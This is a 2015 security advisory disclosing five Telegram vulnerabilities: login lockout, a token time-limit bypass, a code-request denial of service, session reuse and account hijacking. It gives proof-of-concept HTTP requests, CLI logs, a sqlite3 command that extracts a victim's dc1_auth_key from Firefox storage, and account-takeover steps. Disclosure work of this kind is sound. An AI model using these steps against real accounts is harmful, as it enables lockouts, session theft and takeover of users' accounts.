Telegram Denial Of Service / Bypass Limit
Posted on 03 October 2015
#[+] Title: Telegram - Multiple Vulnerabilities #[+] Product: Telegram #[+] Vendor: http://telegram.org/ #[+] SoftWare Link : https://web.telegram.org / https://my.telegram.org # # Author : Eduardo Alves # E-Mail : edudx1[ at ]gmail[ dot ]com # Website : tempest.com.br/en/ Info: As we know, the Telegram access uses by default is possible only with a token (5 digits). This token could be obtained by: Eavesdropping/desktop notifications/SMS/incoming calls... ################################################################################### #[1] my.telegram.org Denial Of Service The my.telegram.org website behaves inadequately, blocking the users access after 5 consecutive incorrect phone number attempts. ## PoC: --------------------------------------------------------------------------------- POST /auth/send_password HTTP/1.1 Host: my.telegram.org Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Referer: https://my.telegram.org/auth phone=%2B55818888888 --------------------------------------------------------------------------------- ################################################################################### #[2] Bypass 5 minutes limit to input token After the web.telegram.org asks for a new token, we have 5 minutes to send it. So, just use Telegram-CLI and you can bypass this ## PoC: --------------------------------------------------------------------------------- Telegram-cli version 1.3.3, Copyright (C) 2013-2015 Vitaly Valtman Telegram-cli comes with ABSOLUTELY NO WARRANTY; for details type `show_license'. This is free software, and you are welcome to redistribute it under certain conditions; type `show_license' for details. Telegram-cli uses libtgl version 2.0.3 Telegram-cli includes software developed by the OpenSSL Project for use in the OpenSSL Toolkit. (http://www.openssl.org/) Telegram-cli uses libpython version 2.7.6 I: config dir=[/home/ubuntu/.telegram-cli] phone number: +558888888888 code ('call' for phone call): <----- ex: You can put after 24 hours --------------------------------------------------------------------------------- ################################################################################### #[3] Telegram Denial Of Service in token request By submitting incorret code attempts, a normal user can't ask for a new code for an indetermined period of time. ## PoC: --------------------------------------------------------------------------------- Telegram-cli version 1.3.3, Copyright (C) 2013-2015 Vitaly Valtman Telegram-cli comes with ABSOLUTELY NO WARRANTY; for details type `show_license'. This is free software, and you are welcome to redistribute it under certain conditions; type `show_license' for details. Telegram-cli uses libtgl version 2.0.3 Telegram-cli includes software developed by the OpenSSL Project for use in the OpenSSL Toolkit. (http://www.openssl.org/) Telegram-cli uses libpython version 2.7.6 I: config dir=[/home/ubuntu/.telegram-cli] phone number: +558388888888 code ('call' for phone call): 123123 *** incorrect code code ('call' for phone call): 123123 *** incorrect code code ('call' for phone call): 123123 *** incorrect code code ('call' for phone call): 123123 *** incorrect code code ('call' for phone call): 123123 *** incorrect code code ('call' for phone call): 123123 *** incorrect code code ('call' for phone call): 123123 *** incorrect code --------------------------------------------------------------------------------- Error: In web.telegram.org --------------------------------------------------------------------------------- Method: auth.signIn Result: {"_":"rpc_error","error_code":420,"error_message":"FLOOD_WAIT_86129"} Stack: Error at h (https://web.telegram.org/js/app.js:16:26020) at https://web.telegram.org/js/app.js:16:27238 at l (https://web.telegram.org/js/app.js:8:6393) at https://web.telegram.org/js/app.js:8:6565 at u.$eval (https://web.telegram.org/js/app.js:8:13762) at u.$digest (https://web.telegram.org/js/app.js:8:12258) at https://web.telegram.org/js/app.js:8:13847 at s (https://web.telegram.org/js/app.js:7:744) at https://web.telegram.org/js/app.js:7:2742 at n (https://web.telegram.org/js/app.js:2:16525) --------------------------------------------------------------------------------- ################################################################################### #[4] User identity validation abscence In various scenarios web applications require session management and access control mechanisms in order to enforce certain actions to be carried out, exclusively, by certified/authorized personnel. In web.telegram.org, this management control is implemented through Local Storage. However, there is a possibility of an attacker — who possesses valid dc1_auth_key from the victim — to access the application alongside the true user of the given account. Ex: Firefox --------------------------------------------------------------------------------- sqlite3 -header -separator " " webappsstore.sqlite "select * from webappsstore2;" > out.txt; cat out.txt | grep dc1_aut gro.margelet.bew.:https:443 dc1_auth_key "ccccccccccccc14c18f5b5eab567b23e30a9ffa803027f8ff7c763bb5bbf9bd9908ac5ff53c718b1c8d7b7f9b040956184ca7748cfdaed5eeec071cdbc18cb06151b83ad8edd8febf2c6832b875627e1467c8dd4c612cda4df63cdf95129c960e6521806e12debc3b96846acf668b74c32f3f1f8ad820a60de836316523549cccccccccccccccccc9ec6ec38fd619752d1ed145427dd7600af2312ab493ebebadf6b1effb6e11764887d5c8a679cc371797f92d284dc54c35fb578c41ca61222d7781485cccccccccccccccccccccccca96a97f8dced0a793c80cbd4ed064bb95ea63e69ed912ccf94c53f7563cb27346ccccccccccccccccccc6fd0492db --------------------------------------------------------------------------------- ################################################################################### #[5] Hijacking account and importing contacts If the victim uses only the passcode as two-step verification, we can reset her account, and as a result, the attacker creates the possibility for importing contacts and hijacking the account: - Attacker asks for token using Telegram-Web - Obtains the code - Resets account - Waits for the victim to log-in - Imports contacts (auto) - Kills the victim's session - Enables Two-Step verification (passcode + email) Thanks to: Leandro Oliveira Joaquim Brasil Marcelo Pessoa Toronto Garcez Tiago Barbosa From Tempest Security Intelligence